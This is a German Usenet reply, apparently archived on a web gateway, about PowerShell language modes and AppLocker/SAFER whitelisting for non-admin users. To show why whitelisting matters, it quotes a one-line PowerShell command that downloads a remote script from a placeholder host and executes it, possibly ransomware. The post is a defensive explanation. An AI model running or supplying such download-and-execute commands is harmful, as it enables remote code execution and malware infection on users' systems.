Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]


Groups > de.comp.os.ms-windows.misc > #234824

Re: Powershell function ohne Admin-Rechte

From "Christoph Schneegans" <christoph@schneegans.de>
Newsgroups de.comp.os.ms-windows.misc
Subject Re: Powershell function ohne Admin-Rechte
Date 2026-01-16 08:21 +0100
Message-ID <msu780F2hujU1@mid.individual.net> (permalink)
References <HGAcmfIYVaB@point04.soemtron.de><HGnjjOQIVaB@point04.soemtron.de> <mspvoqFbfsrU1@mid.individual.net> <HGvkYaw2VaB@point04.soemtron.de>

Show all headers | View raw


Christian @Soemtron schrieb:

> Christoph Schneegans <christoph@schneegans.de> schrieb:
>
>> Schadsoftware mag es, wenn sie PowerShell-Code ausführen kann, und
>> das macht sie typischerweise nicht mit einer Datei, sondern per
>> »powershell.exe -Command " "«.
>
> Aber doch nur Scripte aus freigegebenen Verzeichnissen - wie soll ein
> Schadscript da hinkommen?

Ein Angreifer muss keine Datei ablegen. Es genügt, durch eine
Sicherheitslücke in Browser oder E-Mail-Programm oder wie auch immer den
kurzen Befehl

  powershell.exe -Command "irm 'https://example.org/temp/test.ps1'|iex"

zur Ausführung zu bringen. In test.ps1 kann sich etwa ein
Ransomware-Script befinden, und dieses Skript kann im
FullLanguage-Sprachmodus viel mehr und viel leichter Unfug treiben als im
ConstrainedLanguage-Sprachmodus.

>> Wenn du auf einem System mit Whitelisting-Konfiguration (egal
>> ob SAFER oder AppLocker) PowerShell als eingeschränkter Benutzer
>> und im FullLanguage-Sprachmodus starten willst, musst du deshalb
>> vorübergehend dafür sorgen, dass diese Skripte zugelassen werden.
>
> Oje, was für ein Aufwand.

Ich mache das im Idealfall einmal pro Monat, und die beiden
PowerShell-Sitzungen – eine mit Administrator-Rechten, eine ohne, aber
beide im FullLanguage-Sprachmodus – bleiben offen, solange Windows läuft.

-- 
https://schneegans.de/windows/unattend-generator/ · unattend.xml erzeugen

Back to de.comp.os.ms-windows.misc | Previous | NextPrevious in thread | Next in thread | Find similar


Thread

Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-03 20:56 +0200
  Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 08:25 +0100
    Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 11:54 +0100
    Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-04 13:21 +0200
      Re: Powershell function ohne Admin-Rechte Arno Welzel <usenet@arnowelzel.de> - 2026-01-08 14:06 +0100
  Re: Powershell function ohne Admin-Rechte Joerg Gerlach <jger@gmx.de> - 2026-01-05 19:29 +0100
    Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-06 11:16 +0200
      Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-13 09:32 +0200
        Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-14 17:49 +0100
          Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-15 21:53 +0200
            Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-16 08:21 +0100
              Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-19 11:41 +0200
                Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-23 23:28 +0100

csiph-web